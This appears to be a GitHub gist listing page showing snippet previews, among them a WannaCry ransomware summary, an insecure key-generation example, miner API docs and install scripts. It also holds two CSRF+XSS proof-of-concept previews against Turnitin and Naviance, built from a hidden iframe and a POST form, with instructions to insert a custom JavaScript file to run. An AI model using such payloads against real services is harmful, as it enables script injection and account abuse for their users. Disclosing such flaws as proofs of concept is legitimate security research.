Skip to content

Instantly share code, notes, and snippets.

shipping bugs

Aaron Esau Arinerron

shipping bugs
View GitHub Profile
sirdarckcat /
Last active Jun 22, 2019 download all CTF tasks


wget && chmod +x
mkdir -p google-ctf-2019
DATABASE_URL= ./ google-ctf-2019/ctf
DATABASE_URL= ./ google-ctf-2019/bq
defuse / example.js
Created May 12, 2018
Insecure code that's visually identical to secure code.
View example.js
let KEY = new Uint8Array(16);
function generate_key() {
let KEY = new Uint8Array(16);
return KEY;
KEY = generate_key();
document.body.innerText = KEY;
View That one program
var_30= qword ptr -30h
var_24= dword ptr -24h
var_20= dword ptr -20h
var_1C= dword ptr -1Ch
var_18= dword ptr -18h
var_14= dword ptr -14h
var_10= dword ptr -10h
var_8= qword ptr -8
push rbp
View crypto
ivy / API.txt
Created Jul 3, 2017
Claymore JSON-RPC API documentation (from Claymore v9.6)
View API.txt
EthMan uses raw TCP/IP connections (not HTTP) for remote management and statistics. Optionally, "psw" field is added to requests is the password for remote management is set for miner.
The following commands are available (JSON format):
{"result": ["9.3 - ETH", "21", "182724;51;0", "30502;30457;30297;30481;30479;30505", "0;0;0", "off;off;off;off;off;off", "53;71;57;67;61;72;55;70;59;71;61;70", "", "0;0;0;0"]}
Arinerron / turnitin.html
Created May 23, 2017 CSRF+XSS / proof of concept
View turnitin.html
<title> PoC</title>
Search for the string "[jsfile]" without quotes and replace it with the URL to your custom js file you want to run.
To test it out, replace "[jsfile]" with "".

WannaCry|WannaDecrypt0r NSA-Cyberweapon-Powered Ransomware Worm

  • Virus Name: WannaCrypt, WannaCry, WanaCrypt0r, WCrypt, WCRY
  • Vector: All Windows versions before Windows 10 are vulnerable if not patched for MS-17-010. It uses EternalBlue MS17-010 to propagate.
  • Ransom: between $300 to $600. There is code to 'rm' (delete) files in the virus. Seems to reset if the virus crashes.
  • Backdooring: The worm loops through every RDP session on a system to run the ransomware as that user. It also installs the DOUBLEPULSAR backdoor. It corrupts shadow volumes to make recovery harder. (source: malwarebytes)
  • Kill switch: If the website is up the virus exits instead of infecting the host. (source: malwarebytes). This domain has been sinkholed, stopping the spread of the worm. Will not work if proxied (source).

update: A minor variant of the viru

rueberger /
Created Apr 20, 2017
Simple script that parses and returns the output of nvidia-smi
import commands
import numpy as np
def fetch_gpu_status():
""" Run nvidia-smi and parse the output
requires Python 2 only dependency
status_code, output = commands.getstatusoutput('nvidia-smi')
Arinerron / naviance.html
Created Apr 11, 2017
Naviance CSRF+XSS / proof of concept
View naviance.html
Search for the string "[jsfile]" without quotes and replace it with the URL to your custom js file you want to run.
To test it out, replace "[jsfile]" with "".
<iframe style="display:none" name="csrf-frame"></iframe>
<form method='POST' action='' target="csrf-frame" id="csrf-form">
Arinerron /
Created Jan 17, 2017
Installs Python-3.4.2
tar xvf Python-3.4.2.tgz
cd Python-3.4.2
make test
sudo make install
cd ..
rm -rf Python-3.4.2
rm Python-3.4.2.tgz
You can’t perform that action at this time.